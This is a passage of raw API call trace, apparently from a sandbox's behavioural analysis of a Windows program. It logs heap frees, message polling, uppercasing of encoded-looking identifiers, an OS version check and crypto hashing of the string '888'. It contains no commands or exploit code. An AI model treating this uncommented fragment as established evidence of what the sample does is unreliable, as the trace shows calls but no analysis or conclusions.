hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.235] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0103.235] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.236] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.236] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0103.236] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.236] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0103.236] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.236] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0103.237] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.238] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.238] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.238] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0103.238] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.238] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0103.239] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0103.239] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0103.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0103.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0103.239] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0103.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0103.239] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.239] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.239] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.239] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0103.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0103.239] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.239] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.239] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0103.239] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.239] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0103.239] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0103.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0103.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0103.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7180, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0103.240] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf6e8) returned 1 [0103.240] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.240] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.241] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0103.241] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.241] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0103.241] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.241] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.241] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.241] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.241] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.241] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.241] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0103.241] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.241] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0103.241] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.241] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.241] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.241] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.241] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.241] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.241] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.241] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0103.241] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.241] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0103.241] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.241] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.242] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0103.242] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.242] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0103.242] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.242] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.242] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.242] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.242] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.242] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.242] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.242] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.242] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.242] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0103.242] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.242] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0103.242] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.242] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.242] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.242] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.243] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.243] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.243] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.243] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.243] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.243] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.243] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.243] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0103.243] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.243] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0103.243] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.243] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.243] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9c40, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0103.243] CryptCreateHash (in: hProv=0x9bf6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0103.243] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.243] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.243] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.243] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0103.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0103.244] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0103.244] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0103.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", 